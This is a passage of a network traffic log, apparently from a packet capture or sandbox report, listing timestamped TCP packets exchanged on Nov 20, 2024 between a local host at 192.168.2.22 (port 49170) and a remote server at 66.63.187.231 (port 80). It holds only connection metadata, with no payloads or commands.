Nov 20, 2024 10:11:25.703676939 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.703690052 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.703701973 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.703752041 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.703773022 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.703958988 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.703970909 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.703982115 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.703994036 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.704111099 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.704111099 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.704111099 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.704291105 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.704302073 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.704312086 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.704323053 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.704339981 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.704349041 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.704363108 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.753705025 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.753716946 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.753727913 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.753762960 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.753786087 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.753875017 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.753886938 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.753896952 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.753918886 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.753927946 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754268885 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754281044 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754292011 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754302979 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754314899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754317999 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754328012 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754334927 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754348040 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754359961 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754756927 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754770041 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754780054 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754791021 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754802942 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754812002 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754815102 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.754827023 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.754849911 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755228043 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755239964 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755249977 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755263090 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755271912 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755275011 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755285978 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755287886 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755301952 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755810976 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755822897 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755832911 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755837917 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755846977 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755858898 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755860090 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755871058 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755875111 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755884886 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755889893 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755897045 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755903006 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755911112 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755919933 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755923033 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.755930901 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.755944967 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756747007 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756758928 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756769896 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756781101 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756792068 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756793022 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756804943 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756805897 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756817102 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756819963 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756829023 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756835938 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756840944 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756850958 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756851912 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.756870985 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.756889105 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757688999 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757702112 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757713079 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757724047 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757735014 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757738113 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757747889 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757749081 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757759094 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757766008 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757771015 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757780075 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757782936 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757791042 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757796049 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757805109 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757807970 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.757818937 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.757832050 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758624077 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758635044 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758646011 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758661985 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758673906 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758677006 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758686066 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758692026 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758698940 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758704901 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758711100 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758718967 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758723021 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758732080 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758735895 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.758744001 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.758759975 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759004116 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759572983 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759584904 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759594917 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759609938 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759620905 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759625912 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759633064 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759649038 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759651899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759659052 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759664059 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759670973 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759679079 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759685993 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759691000 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.759699106 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759711981 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.759726048 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.760519028 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760529995 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760540009 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760551929 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760562897 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760572910 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760574102 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.760585070 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760587931 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.760596991 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760606050 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.760607958 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760628939 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.760636091 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760647058 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.760658026 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.760673046 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761363029 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761373997 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761384010 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761394978 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761408091 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761415958 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761415958 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761420012 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761429071 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761432886 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761440992 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761444092 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761455059 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761456966 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761467934 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761470079 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761481047 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761487007 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761492014 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.761498928 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761512041 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761527061 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.761698008 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.762120008 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.762130976 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.762141943 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.762151957 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.762164116 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.762165070 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.762180090 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.762195110 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.792646885 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.792659998 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.792670965 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.792705059 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.792717934 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.792778015 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.792805910 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.792817116 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.792841911 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.793056965 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793068886 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793103933 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.793184042 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793195963 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793236017 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.793253899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793265104 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793275118 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793286085 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.793287039 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.793299913 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.793313980 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.845487118 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845499039 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845550060 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.845617056 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845769882 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845782042 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845788956 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.845802069 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.845815897 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.845957994 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845968962 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845980883 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845993042 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.845999956 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846004963 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846013069 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846018076 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846040964 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846052885 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846052885 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846445084 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846457005 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846467972 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846481085 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846487045 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846493959 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846502066 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846508026 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846513987 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846522093 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.846525908 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846539974 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.846551895 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847040892 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847052097 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847062111 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847073078 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847080946 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847084999 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847095966 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847106934 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847119093 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847352028 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847362995 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847374916 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847387075 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847394943 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847399950 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847408056 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847419977 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847434998 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847534895 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847547054 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847558022 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847570896 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847578049 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847590923 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847604036 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.847706079 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847718000 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.847748041 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848366976 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848380089 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848412037 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848507881 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848520041 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848531008 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848543882 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848547935 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848561049 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848575115 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848683119 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848694086 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848706007 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848716974 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848725080 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848727942 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.848737955 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.848751068 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849348068 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849359989 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849371910 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849387884 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849400997 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849530935 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849543095 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849553108 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849565029 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849574089 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849576950 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849586964 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849590063 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849601030 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849603891 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849615097 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849617958 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849630117 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.849634886 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849647999 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.849663019 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850207090 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850218058 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850229025 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850239992 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850249052 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850253105 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850261927 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850275040 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850289106 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850383043 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850394011 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850404978 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850415945 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850421906 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850429058 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850438118 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850441933 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.850450039 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850462914 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.850476027 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851130009 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851144075 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851155043 CET	80	49170	66.63.187.231	192.168.2.22
